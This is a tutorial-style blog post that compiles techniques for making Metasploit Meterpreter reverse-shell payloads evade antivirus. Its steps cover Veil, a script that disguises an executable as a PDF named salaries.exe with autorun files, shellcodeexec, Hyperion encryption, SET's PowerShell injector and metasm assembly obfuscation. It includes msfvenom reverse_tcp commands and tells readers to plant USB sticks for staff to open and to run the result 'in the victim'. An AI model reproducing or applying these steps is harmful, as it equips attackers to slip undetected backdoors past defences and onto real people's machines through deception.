Today we are gonna talk about different AV evasion frameworks for metasploit payload & how to use them? It`s very imporatant when you know which AV you have to bypass, because we don`t have to worry about FUD. Some payload can bypass specific AV ; while other AV can not be bypassed using that payload.
Veil is python based tool which create FUD payload , One of the best framework for AV evasion. On the 15th of every month, at least one new payload module will be released.
Introducing a simple script I have created to bypass most Anti-Virus products. This script is based on scripts I used whilst attempted to avoid A.V, credit to all authors of the mentioned scripts below for their research and work. This was just a very quick script I put together to make life a bit easier.
What it does it generator a Metasploit Meterpreter payload executable automatically for you. It auto changes the icon to a PDF and also auto creates AutoRun files. So you can then use this file via a shell upload to get a reverse shell via Metasploit, place on a USB stick for some social engineering/Phishing attacks, or burn to a CDROM for some AutoRun fun.
There are many good tools/scripts around, but a lot of these are now detected by most Anti-Virus products. On a recent laptop assessment I was getting blocked by McAfee attempting a AutoRun exploit and most tools and encoding would not get round this, so I decided to knock up a quite script that did get round it.
Even if you are not looking to get around A.V, or this gets detected more in the future it is a very easy script to generate you a quick Meterpreter payload for your local or remote listener.
Some screen shots, download path and A.V bypass script comparisons below. At its best my script was only detected by 10 out of 46 Anti-Virus products, these depends on which stealth option you use. At its lowest it was about 14/15 A.V products found this. This is still bypasses 20+ more products than just encoding the payload using Mfsencode or Msfvenom.
It uses Msfencode, but also pads the file and re-compiles the executable including a PDF icon. The file size and contents are never the same for every executable generated, this helps it avoid most Anti-Virus products. The more intelligent A.V products will still pick it up.
Download from the NCC Open Source GitHub Repository below:
Tested on Backtrack 5 and Kali only. Run as root.
Exploit on victim now opens minimised, thanks to @redmeat_uk for the info.
It requires two very small files in order to create the PDF icon and AutoRun files. It will auto download these if they are not within the directory. If it can’t download them it will continue, but it will not create the PDF icons.
If you want to download these two files in advance, just get them below. Place in the same directory as the script is stored. If you want to change the autorun.ico for your own icon this will change the autorun icon. To change the exe icon is a little more complex and is compiled from the icon.res file. Google around and you can create this using windres.
MD5 checksum: ebe763172e90b7f218d522b13abbc5c1
MD5 checksum: 876caf8703c803d7a2359103adc9ce58
Select local system or remote. If you select local it will auto grab your local IP address and use that. If you select alternative, it will ask you which IP address to listen on, then give you the msf listener code to run at the end.
Enter the port number to listen on. If local it doesn’t really matter, but if external they may have some restrictions so try port 80, 443 or 53. A recent test I found workstations could talk directly outbound on DNS/53, so I could get a AutoRun shell out to the internet.
There are 5 options for the payload. The more stealthy the bigger the file. All this is doing is padding out with more random junk, which seems to reduce the detection ratio slightly. If size is not an issue i.e using a CD or USB then try the most stealthy option for better results. I have not tested option 5 on online scanners as it exceeds the upload limit.
It then saves you out the executable named salaries.exe, you can change the name in the top of the script header. You could use this and place on a few USB sticks and leave around the building, I am sure curious staff may want to open, and as it has a PDF icon it helps. It also creates you an autorun directory, simply burn these to a CDROM to try a AutoRun shell or a U3 USB – normal USB sticks won’t AutoRun and obviously if the system has AutoRun disabled it will not work.
It will then launch the listener locally.
Or if you selected an alternative system, it will give you the code to copy and paste to start the listener.
Then run the exploit and you will get your shell. In this case the AutoRun exploited without any user interaction.
I run this over 46 Anti-Virus products and got fairly good results. Below is a comparison I made with the most commonly known and used A.V avoidance tools and scripts.
Standard Metasploit payload (encoded)
Shell Code Exec
Quick high level view on the above scripts.
Shell Code Exec
Great tool created by Bernardo Damele that did get round almost all A.V products. The shellcode exe now does get detected more as this file stays the same. Bernardo allows you to download the source code, so I believe a quick modification to the file and a recompile would get round this.
Download here: https://github.com/inquisb/shellcodeexec
This is also built into SET (Social Engineering Toolkit) under the media generator options.
Great script that inspired my script. Created originally by Astr0baby in 2011 and modified by Vanish3r that generates the Metasploit payload for you. It is getting more detected now.
Download here: http://pastebin.com/7xmvGnks
This works in a very similar way to Shellcode exec, but I found this to be very good and got round a lot of A.V products. This was the only tool that got around Microsoft A.V in my testing.
Download here: https://code.google.com/p/syringe-antivirus-bypass/
tar xf syringe\ 0.1.tar
git clone https://github.com/inquisb/shellcodeexec
we are gonna use downloaded shellcodexec in third step on victim machine.
(3)C:\WINDOWS\Temp>shellcodeexec.exe <msfencode’s alphanumeric-encoded payload>
Hyperion is a runtime encrypter for 32-bit portable executables.
wine /root/.wine/drive_c/MinGW/bin/g++.exe ./Src/Crypter/*.cpp -o crypter.exe
Now generate metasploit payload.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.128 LPORT=443 -f exe >payload.exe
wine crypter.exe payload.exe encrypted_payload.exe
(7)Brute-Force AV Evasion :-
Genpayloads.py is script to generate lots of payloads , then scan folder for specific after that you have some binary left in folder which does not detected by specific AV.
(8)Finding Simple AV Signatures With PowerShell :-
Awesome tutorial here to find AV signatures & then change specific bit which trigger AV . It only works with signature-based antivirus .
Social Engineering Toolkit: Bypassing Anti-Virus using Powershell
Just when it looked like Anti-Virus was getting the upper hand against the Social Engineering Toolkit…
At the Security Bsides conference in Cleveland, David Kennedy the author of SET, showed off some of the program’s new features. One is a very interesting way to get a remote shell by completely bypass Anti-Virus using a Windows Powershell attack. Let’s take a quick look at how this works.
- Fire up SET and pick option number “1” Social Engineering Attacks
- Select option “10” Powershell attack vector:
- Next choose number 1, “Powershell Alphanumeric Shellcode Injector“:
Okay, now just enter the IP address of the Backtrack system and what port you want to use for the windows machine to connect in on. Usually the default, 443 is good enough. SET will now create the exploit code for 32 and 64 bit Windows:
Now that it is done, it gives you the option to start a listener. This sets up SET to receive incoming connections from Windows systems. For those familiar with Metasploit, this just starts the standard multi-handler for a reverse shell. Enter “yes” and pick if you want a 32 or 64 bit listener.
SET starts up Metasploit, runs the payload handler and waits for an incoming connection:
All we need to do now is retrieve the Powershell code that SET created. The code is saved in SET’s Report/ Powershell directory
When you navigate to the directory, you will see both the 32 and 64 bit versions of the Powershell code. If a Windows system runs this code, a remote session will open up to the Backtrack machine. For this example, I will just copy the code:
and Paste it into a Windows 7 command prompt
Once you hit enter, a full remote shell session is created to the Backtrack SET machine:
Game over. The Windows 7 system in this instance was fully updated and had one of the best anti-virus/ internet security programs available. The AV didn’t see a thing.
Powershell is available on almost every Windows box nowadays, making this a very powerful attack. This is an amazing tool for pentesters, but as usual there are those who will try to use it for evil purposes.
Most likely, you would need to be tricked into running this for the attack to be successful. So as always, be very careful opening files and links from e-mails and social media messages. Run an internet browser script blocking program like “NoScript” to prevent code from automatically running from visited websites.
Also be very wary of shortened links, especially used on Twitter. Recently I saw a shortened link on Twitter that when unshrunk was a four line command to a malware server.
11)Ghost Writing ASM :-
1. Create malicious file(backdoor)
$ msfvenom windows/meterpreter/reverse_tcp LHOST=192.168.1.104 LPORT=443 R > raw_binary
$ msfvenom --payload windows/meterpreter/reverse_tcp LHOST=192.168.1.104 LPORT=443 -f raw > raw_binary
2. Copy metasm.rb (ruby library for disassemble file that normally ship with Metasploit ) to metasm folder of environment ruby folder.
$ cd /pentest/exploit/framework/lib/metasm
$ cp -a metasm.rb metasm /usr/lib/ruby/1.9.2
3. Disassemble it
$ ruby /pentest/exploit/framework/lib/metasm/samples/disassemble.rb raw_binary > asm_code.asm
That will create a file called asm_code.asm which should look something like this
4. Now obfuscate it. From the Source.
For now, we’ll continue with the “spray and pray” methodology. You can add anything you want so long as you don’t break the functionality of the application. I find that simply pushing registers onto the stack and then popping them back off sometimes will do the trick. Also just before a XOR statement (which is often used to set the value of a register to zero) you can add a bunch of random statements to increment and decrement the register, move values of other registers into it. Anything you do won’t matter because eventually you will be changing the value to zero. So using the above example we can change the section beginning with ‘// Xrefs: 8dh’
5. Add the following two lines to the top of the file for it to build correctly
6. Use metasm to build the executionable and package it into the format that windows can run.
lib/metasm/samples/peencode.rb asm_code.asm -o coolstuff.exe
7. Now check the file with
$ file coolstuff.exe
8. Run it in the victim with your social engineering skill. Have a nice hack :).